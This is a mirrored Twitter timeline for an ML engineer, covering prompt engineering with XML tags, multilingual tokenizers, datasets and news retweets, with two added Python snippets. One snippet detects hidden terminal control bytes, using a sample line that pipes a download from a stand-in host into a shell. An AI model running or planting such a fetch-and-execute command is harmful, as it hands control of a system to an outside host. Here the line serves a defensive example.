Alex Strick van Linschoten (@strickvl) Twitter Tweets • TwiCopy

Alex Strick van Linschoten

@strickvl

Machine Learning Engineer (@zenml_io), researcher (& author of a few books). (Mastodon): @[email protected] (ML) and @[email protected] (Maths)

ID:244511094

Link: https://mlops.systems
Joined: 29-01-2011 13:38:59

1.2K Tweets

1.5K Followers

454 Following

Argilla

2 weeks ago

💥After months of work, we're thrilled to introduce ⚗️distilabel 1.0.0!

🚀More flexible, robust, and powerful.

🙌 Let's empower the community to build the most impactful datasets for Open Source AI!

Blogpost: argilla.io/blog/introduci…
Github: github.com/argilla-io/dis…

92 likes

Andy Carnevale

3 weeks ago

Alex Strick van Linschoten Jeremy Howard In my experience, using XML makes a big difference in the quality of output. The cool thing is that you can just make up your own XML tags and Claude will just play along!

docs.anthropic.com/claude/docs/us…
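A minimal sketch of the tagging idea described in the tweet above, using only plain Python string handling. The tag names (`document`, `instructions`) and the helpers `tag` and `build_prompt` are made up for illustration; they are not part of any Anthropic API, and the claim about output quality is not tested here.

```python
def tag(name: str, content: str) -> str:
    """Wrap content in an XML-style tag with an arbitrary, made-up name."""
    return f"<{name}>\n{content.strip()}\n</{name}>"


def build_prompt(document: str, instructions: str) -> str:
    """Join tagged sections so each part of the prompt is clearly delimited."""
    return "\n\n".join([
        tag("document", document),
        tag("instructions", instructions),
    ])


prompt = build_prompt(
    "The quick brown fox.",
    "Summarise the document in one sentence.",
)
print(prompt)
```

The resulting string would then be sent as the user message to whichever model client is in use.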

2 likes

Jeremy Howard

3 weeks ago

Alex Strick van Linschoten Anthropic encourages you to use XML in prompts -- apparently Claude likes that better.

29 likes

Naheed Mustafa

3 weeks ago

The persistence in western media of the view that a person speaking on their own condition is an unreliable narrator of that condition is shameful. This also goes to the heart of the cultural churn in newsrooms here.
(Not a comment on the tweet. Just a related thought).

8 likes

The Atlantic

3 weeks ago

AI understands just a tiny fraction of the thousands of languages used worldwide. That means the promised chatbot revolution could shut out billions of people, and even push some languages to extinction, Matteo Wong writes: theatlantic.com/technology/arc…

54 likes

Sebastian Ruder

3 weeks ago

Command R+ has strong multilingual capabilities. Its tokenizer also compresses multilingual text much better than other tokenizers. For example, in comparison the OpenAI tokenizer uses:
- 1.18x more tokens for Portuguese
- 1.54x more tokens for Chinese
- 1.67x more tokens for…

249 likes

Alex Strick van Linschoten

3 weeks ago

Is it just me or did Apple remove the Colemak keyboard support from iOS devices? Suddenly my device no longer has it… 😱

0 likes

Christian Henderson

3 weeks ago

Fellowships for scholars from Gaza

nias.knaw.nl/fellowships/sa…

149 likes

tomaarsen

3 weeks ago

Big update for the Massive Text Embedding Benchmark (MTEB) intended to simplify finding a good embedding model! Model filtering, search, memory usage, model size in parameters.
The updated leaderboard: huggingface.co/spaces/mteb/le…
Details in 🧵:

92 likes

Just Security

3 weeks ago

Talking to “the Enemy” Shouldn’t be Illegal

By Nicholas Noe and Joshua Andresen

#FirstAmendment #OFAC Knight First Amendment Institute Treasury Department #diplomacy

justsecurity.org/94412/talking-…

37 likes

Stefano Giomo

4 weeks ago

@TheZachMueller @GoogleColab @choldgraf Just `pip install testcell` ;-)

KAGGLE: kaggle.com/code/artste/in…
COLAB: colab.research.google.com/github/artste/…
GITHUB: github.com/artste/testcell

8 likes

Stefano Giomo

4 weeks ago

@TheZachMueller @GoogleColab @choldgraf I developed the 🧪 %%testcell 🧪 cell-magic with a similar need in mind: make it easy to do exploratory programming, try out various experiments without the risk of a single function or variable 'polluting' the global scope.

Launching blog post: artste.github.io/blog/posts/int…

2 likes

Jay Alammar

1 month ago

In a lot of other models, Arabic/اللغة العربية (and other non-English languages) are more expensive to use because the tokenizer basically punishes other languages by requiring a lot more tokens to represent their text.

Command R+ improves the tokenization, requiring less tokens…

102 likes

Sebastian Ruder

1 month ago

Command R+ (⌘ R+) is our most capable model (with open weights!) yet! I’m particularly excited about its multilingual capabilities. It should do pretty well in 10 languages (English, French, Spanish, Italian, German, Portuguese, Japanese, Korean, Arabic, and Chinese).

You can…

421 likes

Pablo Montalvo

1 month ago

It was hard to find quality OCR data... until today! Super excited to announce the release of the 2 largest public OCR datasets ever 📜 📜

OCR is critical for document AI: here, 26M+ pages, 18b text tokens, 6TB! Thanks to UCSF Library, Industry Documents Library and PDF Association
🧶 ↓

625 likes

Alex Strick van Linschoten

1 month ago

Publishing a new dataset today, this time a unique collection of translations from the 2006-2009 period in Afghanistan. Back then I founded and ran a media monitoring organisation/startup in Kabul, staffed by a small team of amazing translators.
mlops.systems/posts/2024-04-…

14 likes

حسام شبات

1 month ago

I have been working nonstop for the past 6 months covering what’s happening in Gaza, but what I saw today while visiting Al-Shifa hospital was unlike anything I’ve ever witnessed before :

Israeli occupation forces executed 300 Palestinians in and around the hospital, and this…

33.4K likes

Devansh (⚡, 🥷)

1 month ago

If you, like many, think relying just on `cat` command's output is enough to be sure about the integrity of a bash file. Think twice, you could get hacked. Read below 👇
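The thread behind this tweet is not reproduced here, so the mechanism is an assumption: one well-known way for `cat` output to mislead is that a terminal interprets control bytes (escape sequences, carriage returns) instead of displaying them, which can visually hide part of a file. The sketch below scans raw bytes for such characters; the function name `find_control_bytes` and the sample script are hypothetical.

```python
import re

# Control bytes a terminal acts on rather than shows: everything in the C0
# range except tab (0x09) and newline (0x0a), plus DEL (0x7f).
SUSPICIOUS = re.compile(rb"[\x00-\x08\x0b-\x1f\x7f]")


def find_control_bytes(data: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte value) for every control byte found in data."""
    return [(m.start(), m.group()[0]) for m in SUSPICIOUS.finditer(data)]


# Hypothetical script: the middle line is followed by ESC[2K (erase line)
# and a carriage return, which may hide it when printed to a terminal.
script = b"echo safe\n" + b"curl evil.example | sh\x1b[2K\r" + b"echo done\n"
hits = find_control_bytes(script)
print(hits)
```

A non-empty result suggests inspecting the file with a tool that prints raw bytes rather than trusting the rendered terminal output.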

3.6K likes
